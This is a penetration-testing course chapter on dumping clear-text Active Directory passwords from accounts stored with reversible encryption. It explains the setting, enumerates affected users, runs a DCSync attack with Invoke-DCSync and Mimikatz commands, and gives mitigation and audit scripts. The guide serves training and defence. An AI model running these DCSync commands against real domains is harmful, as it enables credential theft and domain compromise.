Active Directory Pentest Course-1

Page 1 of 7

Contents

Credential Dumping – Active Directory Plain Text Password
  Introduction
  Do you know?
  Lab Setup
    Enabling Reversible encryption in Active Directory Users
  Enumeration
  Attack: DC-Sync
  Mitigation
  Conclusion

Credential Dumping – Active Directory Plain Text Password

Introduction
According to MITRE, an adversary may abuse Active Directory authentication encryption
properties to gain access to credentials on Windows systems. The
AllowReversiblePasswordEncryption property specifies whether reversible password
encryption for an account is enabled or disabled. By default this property is disabled (user
credentials are instead stored as the output of one-way hashing functions), and it should not be
enabled unless legacy or other software requires it.

• MITRE Tactic: Credential Access (TA0006)
• MITRE Technique: Modify Authentication Process (T1556)
• MITRE Sub-technique: Reversible Encryption (T1556.005)

When reversible encryption is enabled for a user account, the domain controller stores the
password in a form that can be decrypted back to the user's clear-text password (it is kept in
the account's supplementalCredentials attribute as the Primary:CLEARTEXT package). A
password stored under this policy is therefore not a hash: a function exists that turns the
stored value back into the original clear-text password, and anyone who can read the stored
secrets, for example through a DCSync, gets the password itself rather than something they
still have to crack.

Do you know?
As per Microsoft: if you use the Challenge Handshake Authentication Protocol (CHAP) through
remote access or Internet Authentication Services (IAS), you must enable this policy setting.
CHAP is an authentication protocol that is used by remote access and network connections.
Digest Authentication in Internet Information Services (IIS) also requires that you enable this
policy setting. These are the only legitimate reasons to turn it on, and even then it should be
limited to the accounts that actually need it.

Lab Setup

Enabling Reversible encryption in Active Directory Users


There are multiple methods to enable the reversible encryption property:

1) User Account Property

Enable reversible encryption by modifying the account properties of the domain user: in
Active Directory Users and Computers, open the user's Properties, go to the Account tab and
tick "Store password using reversible encryption".

2) PowerShell Command

Set-ADUser requires an identity, so supply the target user (ActiveDirectory RSAT module):

    Set-ADUser -Identity <sAMAccountName> -AllowReversiblePasswordEncryption $true

3) Group Policy Management

Enable "Store passwords using reversible encryption" under Computer Configuration\Windows
Settings\Security Settings\Account Policies\Password Policy. Note the scope: set in the Default
Domain Policy this applies to every user in the domain, not just one account, which is why it is
the most dangerous of the three methods.

Validate the property through the user's Properties, Attribute Editor tab, by inspecting
userAccountControl: the setting corresponds to the ENCRYPTED_TEXT_PWD_ALLOWED bit (0x80,
decimal 128), so a normal enabled account that shows 512 shows 640 once the flag is set.

NOTE: Enabling the property does not convert the password that is already stored; the clear-text
is recorded only when the password is next set or changed. So once the system administrator
resets the user's password (or the user changes it), an adversary may be able to obtain the
plaintext of any password created or changed after the property was enabled.

Enumeration
PowerShell command to find users with allow reversible password encryption enabled:

    Get-ADUser -Filter {AllowReversiblePasswordEncryption -eq $true} | Select-Object Name, sAMAccountName
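The lab steps above (enable the flag on one account, validate it through userAccountControl) and the enumeration command, as a single added PowerShell example; it is not code from the original article. It assumes the ActiveDirectory RSAT module, a lab account named labuser (an assumption) and rights to modify it. The enumeration uses the LDAP bitwise-AND matching rule (OID 1.2.840.113556.1.4.803) so the bit test runs on the domain controller instead of relying on the friendly property name.

```powershell
# Added example, not from the original article. Assumes the ActiveDirectory (RSAT) module,
# a lab account named "labuser" (assumption) and rights to modify it.
Import-Module ActiveDirectory

$ENCRYPTED_TEXT_PWD_ALLOWED = 0x80   # userAccountControl bit behind "Store password using reversible encryption"
$Target = 'labuser'                  # assumed lab account

# 1) Enable the flag on one account (same effect as the ADUC checkbox, scoped to this user only)
Set-ADUser -Identity $Target -AllowReversiblePasswordEncryption $true

# 2) Validate via the raw userAccountControl value rather than the friendly property
$uac = (Get-ADUser -Identity $Target -Properties userAccountControl).userAccountControl
if ($uac -band $ENCRYPTED_TEXT_PWD_ALLOWED) {
    '{0}: userAccountControl = 0x{1:X} (ENCRYPTED_TEXT_PWD_ALLOWED set)' -f $Target, $uac
} else {
    throw "$Target does not have ENCRYPTED_TEXT_PWD_ALLOWED set"
}

# 3) Enumerate every user with the bit set. LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803)
#    performs the bitwise test server-side; 128 is the decimal value of 0x80.
$ldap = '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=128))'
Get-ADUser -LDAPFilter $ldap -Properties userAccountControl, PasswordLastSet |
    Select-Object Name, sAMAccountName, PasswordLastSet,
        @{ n = 'UAC'; e = { '0x{0:X}' -f $_.userAccountControl } }
```

PasswordLastSet is included on purpose: only passwords set or changed after the flag was enabled are stored reversibly, so an account whose password predates the change has the flag but no clear-text yet, and a DCSync against it will return only the hashes.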

Attack: DC-Sync
In our Pervious article we have describe about DCsyn attack, read more from here. You can download the
DC Sync Script tool here.

Commands to execute in the domain controller to check user clear text password.

1. powershell.exe -ep bypass
2. Import-Module .\Invoke-DCSync.ps1
3. Invoke-DCSync -AllData

-AllData replicates every account in the domain; the underlying Mimikatz call can also target a
single account with lsadump::dcsync /domain:<domain> /user:<user>. For an account with the flag
set, the DCSync output includes the clear-text password (Mimikatz lists it under the account's
supplemental credentials as Primary:CLEARTEXT) alongside the NTLM hash.

Mitigation
• Ensure the Allow Reversible Password Encryption property is disabled on every account. After
  clearing it, force a password change: the clear-text already stored in supplementalCredentials
  remains until the password is changed, so clearing the flag alone does not remove it.

• Ensure the "Store passwords using reversible encryption" setting is Disabled in the Default
  Domain Policy and in any fine-grained password policy, which can re-enable it for specific groups.

• If a legacy application (CHAP, IIS Digest) genuinely needs it, scope it with a fine-grained
  password policy to the smallest possible set of accounts and monitor those accounts.

• DCSync itself can be detected by auditing Directory Service Access (event ID 4662) for the
  DS-Replication-Get-Changes-All control access right being exercised by accounts that are not
  domain controllers.
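The mitigation checks above, as an added PowerShell example that is not part of the original article. It assumes the ActiveDirectory RSAT module and rights to read the password policies and modify the accounts it finds; the clean-up forces a password change because clearing the flag leaves the already-stored clear-text in place.

```powershell
# Added example, not from the original article. Assumes the ActiveDirectory (RSAT) module and
# rights to read password policies and modify the affected accounts.
Import-Module ActiveDirectory

# a) Domain-wide setting, as applied by the Default Domain Policy
$ddp = Get-ADDefaultDomainPasswordPolicy
if ($ddp.ReversibleEncryptionEnabled) {
    Write-Warning 'Default Domain Policy stores passwords using reversible encryption'
}

# b) Fine-grained password policies can re-enable it for specific groups
Get-ADFineGrainedPasswordPolicy -Filter * |
    Where-Object { $_.ReversibleEncryptionEnabled } |
    ForEach-Object { Write-Warning "Fine-grained policy '$($_.Name)' enables reversible encryption" }

# c) Per-account flag (ENCRYPTED_TEXT_PWD_ALLOWED = 0x80 = 128): clear it and force a password
#    change, since the stored clear-text survives until the password is changed
$flagged = Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=128)' `
                      -Properties userAccountControl, PasswordLastSet
foreach ($u in $flagged) {
    Set-ADUser -Identity $u -AllowReversiblePasswordEncryption $false -ChangePasswordAtLogon $true
    "Cleared reversible encryption on {0} (last password set {1}); change at next logon required" -f `
        $u.sAMAccountName, $u.PasswordLastSet
}
```

For the domain-wide setting, fix it in the Group Policy editor (the article's method 3) rather than only through Set-ADDefaultDomainPasswordPolicy, because the GPO is the source of that value and will reapply it. Service accounts that never log on interactively will not honour ChangePasswordAtLogon, so reset their passwords explicitly.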

Conclusion
In this article, we retrieved the clear-text passwords of Active Directory user accounts whose
passwords are stored using reversible encryption, by replicating the stored secrets with DCSync.
This article can serve as a reference for Red Team operators for Credential Dumping – Active
Directory Plain Text Password, and for defenders as a reminder that the setting belongs in
password-policy and userAccountControl audits.

www.ignitetechnologies.in